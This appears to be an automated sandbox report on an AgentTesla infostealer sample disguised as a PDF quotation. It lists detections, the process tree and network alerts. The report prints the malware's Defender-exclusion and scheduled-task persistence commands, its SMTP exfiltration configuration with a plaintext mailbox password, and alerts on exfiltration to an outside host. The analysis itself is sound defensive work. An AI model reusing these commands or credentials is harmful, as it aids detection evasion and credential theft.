Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UN-Quotation 70000000187366444_PDF.exe

Overview

General Information

Sample Name:UN-Quotation 70000000187366444_PDF.exe
Analysis ID:652379
MD5:0bfb0ab1e8c7ec929e44d70c196b4d21
SHA1:89c971ae9a832cdfe2e56e8adfe9972505059c2c
SHA256:cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
Tags:Agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • UN-Quotation 70000000187366444_PDF.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe" MD5: 0BFB0AB1E8C7EC929E44D70C196B4D21)
    • powershell.exe (PID: 6608 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6712 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6780 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}
SourceRuleDescriptionAuthorStrings
0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32b1e:$s10: logins
                • 0x32585:$s11: credential
                • 0x2eb6e:$g1: get_Clipboard
                • 0x2eb7c:$g2: get_Keyboard
                • 0x2eb89:$g3: get_Password
                • 0x2fe80:$g4: get_CtrlKeyDown
                • 0x2fe90:$g5: get_ShiftKeyDown
                • 0x2fea1:$g6: get_AltKeyDown
                10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 31 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.3193.46.84.142497415872840032 06/26/22-09:22:47.581294
                    SID:2840032
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.46.84.142497415872030171 06/26/22-09:22:47.581243
                    SID:2030171
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.3193.46.84.142497415872851779 06/26/22-09:22:47.581294
                    SID:2851779
                    Source Port:49741
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: UN-Quotation 70000000187366444_PDF.exeVirustotal: Detection: 37%Perma Link
                    Source: UN-Quotation 70000000187366444_PDF.exeReversingLabs: Detection: 19%
                    Source: C:\Users\user\AppData\Roaming\XrgnLg.exeReversingLabs: Detection: 19%
                    Source: UN-Quotation 70000000187366444_PDF.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\XrgnLg.exeJoe Sandbox ML: detected
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "giedre@bonsa.lt", "Password": "201Bon@22", "Host": "mail.bonsa.lt"}
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: global trafficTCP traffic: 192.168.2.3:49741 -> 193.46.84.142:587
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253180685.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248676313.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248638895.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.comH:
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lAnHfH.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bonsa.lt
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.HB
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com:
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comQ
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coma
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-u
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-uFi
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253046638.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.HB
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comue4B
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comv
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260487275.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.259916089.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers#
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260274303.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers)8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257348457.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258973602.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258918421.00000000055C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.267126818.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257743913.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257514571.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257563714.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers48
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersC8
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257985084.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomF
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.295386008.0000000005580000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303672867.0000000005580000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commsd
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251459375.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn#
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251689579.0000000005585000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/jBu
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn8OX
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.263325743.000000000558C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krfk6
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comY
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krcom
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krim
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251850802.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251932047.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comNorm
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.net8bX
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netiv
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnn-u
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue4B
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514197510.000000000313C000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514154750.0000000003129000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oVr11J0CkkX1DVO37.net
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.bonsa.lt

                    System Summary

                    barindex
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
